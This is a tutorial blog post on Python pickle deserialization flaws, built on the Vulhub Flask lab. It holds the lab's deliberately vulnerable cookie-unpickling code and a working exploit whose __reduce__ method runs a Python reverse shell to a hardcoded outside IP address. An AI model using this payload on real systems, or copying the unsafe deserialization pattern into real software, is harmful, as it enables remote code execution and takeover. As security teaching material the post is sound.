Understanding Python Deserialization Vulnerabilities: A Deep Dive into Pickle Exploits

Deserialization flaws are not tied to any one programming language, but security research has focused mostly on Java and PHP deserialization vulnerabilities because those languages are deployed in more scenarios. Python deserialization bugs seem to appear more often in CTF challenges. Python mainly uses the `pickle` module to implement serialization. I noticed that Vulhub provides an environment for Python deserialization vulnerabilities, so I decided to study it.

Let’s first demonstrate Python serialization with a demo I wrote myself.

import pickle

class Hacker():
    def __init__(self, name):
        self.name = name
    def dream(self):
        print(self.name + ' Want To Be Awesome!')

Person = Hacker('Zgao')
Person.dream()
info = pickle.dumps(Person)
print(info)

I created a `Hacker` class, instantiated a `Person` object, and then serialized it using the `pickle` module. The corresponding output is:

Zgao Want To Be Awesome!
b'\x80\x03c__main__\nHacker\nq\x00)\x81q\x01}q\x02X\x04\x00\x00\x00nameq\x03X\x04\x00\x00\x00Zgaoq\x04sb.'

The `b'...'` bytes literal is the serialized content, which is essentially an opaque sequence of bytes. Of course, it can also be deserialized back into an object.

import pickle

class Hacker():
    def __init__(self, name):
        self.name = name
    def dream(self):
        print(self.name + ' Want To Be Awesome!')

Person = Hacker('Zgao')
info = pickle.dumps(Person)
a = pickle.loads(info)
a.dream()

The output is: Zgao Want To Be Awesome!

We deserialized it into the object `a` and successfully called the `dream` method. The process can be summarized as follows:

Serialization Process:

  1. Extract all attributes from the object and convert them into key-value pairs.
  2. Write the class name of the object.
  3. Write the key-value pairs.
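
As a rough illustration of these steps, the byte string printed earlier can be decoded with the standard-library `pickletools` module, which reads a stream opcode by opcode without loading it. This is only a sketch: the `stream` and `ops` names are mine, and the bytes are copied from the output above (pickle protocol 3).

```python
import pickletools

# Byte string copied from the output shown earlier (pickle protocol 3).
stream = (b'\x80\x03c__main__\nHacker\nq\x00)\x81q\x01}q\x02'
          b'X\x04\x00\x00\x00nameq\x03X\x04\x00\x00\x00Zgaoq\x04sb.')

# genops() only parses the stream; it never imports or calls anything.
ops = [(op.name, arg) for op, arg, pos in pickletools.genops(stream)]

for name, arg in ops:
    # BINPUT entries are memo bookkeeping, so skip them for readability.
    if name != "BINPUT":
        print(name, "" if arg is None else repr(arg))
```

The `GLOBAL` entry carries the class reference (`__main__ Hacker`), and the two `BINUNICODE` entries followed by `SETITEM` are the `name` / `Zgao` key-value pair.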

Deserialization Process:

  1. Obtain the pickle input stream.
  2. Reconstruct the attribute list.
  3. Create a new object based on the class name.
  4. Copy the attributes into the new object.
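
The deserialization steps can be observed with a small experiment. The sketch below reuses the `Hacker` class from the demo and adds a hypothetical `init_calls` counter (my addition, not part of the original demo) to show that the object is rebuilt from the class name and the stored attributes rather than by running `__init__` again.

```python
import pickle

class Hacker:
    init_calls = 0  # class-level counter: how many times __init__ has run

    def __init__(self, name):
        Hacker.init_calls += 1
        self.name = name

original = Hacker("Zgao")
data = pickle.dumps(original)

# The stream refers to the class by name and carries the attribute values.
print(b"Hacker" in data, b"Zgao" in data)

restored = pickle.loads(data)

# A distinct object of the same class, with the attributes copied in ...
print(restored is original, type(restored) is Hacker, restored.__dict__)
# ... and __init__ was not run again during loading.
print(Hacker.init_calls)
```

With the default pickling behavior, the counter stays at 1 after loading: pickle creates the instance and then restores its attribute dictionary directly.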

Note, however, that an object can only be deserialized if its class can be found in the environment that loads it; otherwise, the object cannot be reconstructed.

Now that we have a basic understanding of Python serialization and deserialization, let’s look at the vulnerability code provided by Vulhub.

import pickle
import base64
from flask import Flask, request

app = Flask(__name__)

@app.route("/")
def index():
    try:
        user = base64.b64decode(request.cookies.get('user'))
        user = pickle.loads(user)
        username = user["username"]
    except:
        username = "Guest"

    return "Hello %s" % username

if __name__ == "__main__":
    app.run()

It uses Flask again. From the code, we can see that it retrieves the `user` value from the cookies, decodes it with Base64, and then deserializes it. If any exception occurs, the username falls back to “Guest.” When we access the page directly, there is no `user` cookie, decoding fails, and we see “Hello Guest.”

The logic is simple once you have read the code: construct a malicious class, serialize it, encode it with Base64, and send it as a cookie. Still, let’s first look at the exploit provided by Vulhub, which I modified slightly.

#!/usr/bin/env python3
import requests
import pickle
import os
import base64

class exp(object):
    def __reduce__(self):
        s = """python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("47.240.75.183",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'"""
        return (os.system, (s,))

e = exp()
s = pickle.dumps(e)

response = requests.get("http://47.240.75.183:1900/", cookies=dict(user=base64.b64encode(s).decode()))
print(response.content)

Let’s analyze the exploit code. It embeds the reverse shell operation in Python code rather than directly using a Bash reverse shell. It also uses the `__reduce__` magic method. What is its purpose?

A custom type can tell Python how it should be pickled by defining the `__reduce__` method, which is called when the object is pickled. It returns either a string naming a global variable (Python looks the name up and pickles a reference to it) or a tuple. The tuple contains two to six elements (the sixth was added in Python 3.8): the first is a callable that is called to reconstruct the object, the second is a tuple of arguments for that callable, and the remaining elements are optional.
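
To make the tuple form concrete, here is a deliberately harmless sketch. The `Answer` class is hypothetical and exists only for illustration; its `__reduce__` tells pickle to rebuild the object by calling the built-in `int` on a string.

```python
import pickle

class Answer:
    def __reduce__(self):
        # (callable, args): on load, pickle calls int("42") and uses the result.
        return (int, ("42",))

data = pickle.dumps(Answer())
restored = pickle.loads(data)

# What comes back is whatever the callable returned, not an Answer instance.
print(type(restored).__name__, restored)
```

The stream stores only a reference to the callable and its arguments, so the loading side calls whatever callable the stream names.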

For example, if `__reduce__` returns `(eval, ("os.system('ls')",))`, unpickling calls `eval` with the string in the tuple as its argument (assuming the name `os` can be resolved where `eval` runs), which achieves command or code execution. Similarly, it could return `(os.system, ('ls',))`.
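
The same mechanism can be observed safely by swapping in a harmless callable. The sketch below mirrors the cookie-handling logic of the Flask handler without Flask itself. The `greet` function and `Harmless` class are my own stand-ins, and `print` takes the place of a dangerous callable. It suggests why the `try`/`except` in the handler offers no protection: the callable has already run by the time the exception is raised.

```python
import base64
import contextlib
import io
import pickle

class Harmless:
    def __reduce__(self):
        # Stand-in for a dangerous callable: just print a message on load.
        return (print, ("callable ran inside pickle.loads",))

def greet(cookie_value):
    """Same logic as the handler's cookie processing, minus Flask."""
    try:
        user = pickle.loads(base64.b64decode(cookie_value))
        username = user["username"]
    except Exception:
        username = "Guest"
    return "Hello %s" % username

# A well-formed cookie, as a legitimate client might send it.
normal_cookie = base64.b64encode(pickle.dumps({"username": "Zgao"})).decode()
normal_reply = greet(normal_cookie)

# A cookie whose pickle triggers a call instead of carrying a dict.
crafted_cookie = base64.b64encode(pickle.dumps(Harmless())).decode()
captured = io.StringIO()
with contextlib.redirect_stdout(captured):
    crafted_reply = greet(crafted_cookie)

print(normal_reply)
print(crafted_reply)
print(repr(captured.getvalue()))
```

The crafted cookie still produces the "Guest" response, because `print` returns `None` and indexing it raises an exception, yet the message has already been written during `pickle.loads`.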

However, to gain a deeper understanding of Python deserialization vulnerabilities, it’s necessary to analyze the `pickle` source code. This post only scratches the surface. I’ll delve further after reading the `pickle` source code.